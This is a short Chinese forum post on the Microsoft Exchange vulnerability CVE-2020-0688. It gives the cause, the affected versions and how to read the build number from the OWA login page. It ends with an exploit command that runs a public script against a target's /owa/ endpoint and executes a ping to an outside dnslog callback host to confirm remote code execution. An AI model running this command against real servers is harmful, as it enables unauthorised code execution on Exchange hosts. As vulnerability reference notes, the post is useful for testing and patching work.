- 注册
- 09 10, 2024
- 消息
- 186
Python:
## 漏洞概述
由于Exchange服务器在安装时没有正确地创建唯一的加密密钥所造成的
## 影响范围
```http
#需要域用户登陆
2010、2013、2016、2019
```
**对于如何识别版本可以用如下的方式**:
在登录界面查看网页源代码,15.1.225就是版本,之后在[Mircosoft网站](https://docs.microsoft.com/zh-cn/Exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019)上根据版本号就可以直接查询
```html
找到<link rel="shortcut icon" href="/owa/auth/15.1.225/themes/resources/favicon.ico" type="image/x-icon">
```
## EXP
```bash
python CVE-2020-0688.py -s https://ip/owa/ -u user -p pass -c "ping test.ph4nxq.dnslog.cn"
```
[@Ridter](https://github.com/Ridter/cve-2020-0688)
